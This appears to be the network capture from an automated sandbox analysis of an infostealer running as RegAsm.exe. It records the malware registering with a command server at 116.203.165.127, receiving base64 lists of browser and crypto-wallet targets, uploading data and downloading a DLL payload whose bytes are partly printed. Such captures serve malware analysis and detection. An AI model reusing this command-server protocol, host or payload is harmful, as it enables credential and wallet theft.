                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        9192.168.2.949743116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:48:45 UTC188OUTGET / HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:48:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:46 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:48:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        10192.168.2.949746116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:48:47 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJK
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 256
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:48:47 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 37 34 34 39 39 44 41 42 36 45 32 33 37 31 35 34 33 35 31 30 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 2d 2d 0d
                                                                                                                                                                                                                                        Data Ascii: ------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="hwid"7074499DAB6E2371543510-a33c7340-61ca------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------CFIECBFIDGDAKFHIEHJK--
                                                                                                                                                                                                                                        2024-09-21 12:48:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:48 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:48:48 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 3a1|1|1|1|b7d8ef1d8933f25474cb615d1ce026a4|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        11192.168.2.949747116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:48:49 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAK
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:48:49 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------EGDBFIIECBGDGDGDHCAKCont
                                                                                                                                                                                                                                        2024-09-21 12:48:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:49 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:48:49 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                        Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        12192.168.2.949751116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:48:51 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----JEHIIDGCFHIEGDGCBFHD
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:48:51 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 42 46 48 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------JEHIIDGCFHIEGDGCBFHDContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------JEHIIDGCFHIEGDGCBFHDContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------JEHIIDGCFHIEGDGCBFHDCont
                                                                                                                                                                                                                                        2024-09-21 12:48:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:51 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:48:51 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                        Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        13192.168.2.949753116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:48:52 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGD
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 332
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:48:52 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------FCAAEBFHJJDAAKFIECGDCont
                                                                                                                                                                                                                                        2024-09-21 12:48:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:53 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:48:53 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        14192.168.2.949754116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:48:55 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAK
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 6797
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:48:55 UTC6797OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------HDAAAAFIIJDBGDGCGDAKCont
                                                                                                                                                                                                                                        2024-09-21 12:48:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:56 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:48:56 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        15192.168.2.949756116.203.165.1274437436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:48:56 UTC196OUTGET /sqlp.dll HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:48:57 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:56 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 2459136
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Last-Modified: Saturday, 21-Sep-2024 12:48:56 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        2024-09-21 12:48:57 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                                        2024-09-21 12:48:57 UTC16384INData Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                        Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                                                                                                                                        2024-09-21 12:48:57 UTC16384INData Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56
                                                                                                                                                                                                                                        Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                                                                                                                                                                                        2024-09-21 12:48:57 UTC16384INData Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89
                                                                                                                                                                                                                                        Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                                                                                                                                                                        2024-09-21 12:48:57 UTC16384INData Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f
                                                                                                                                                                                                                                        Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
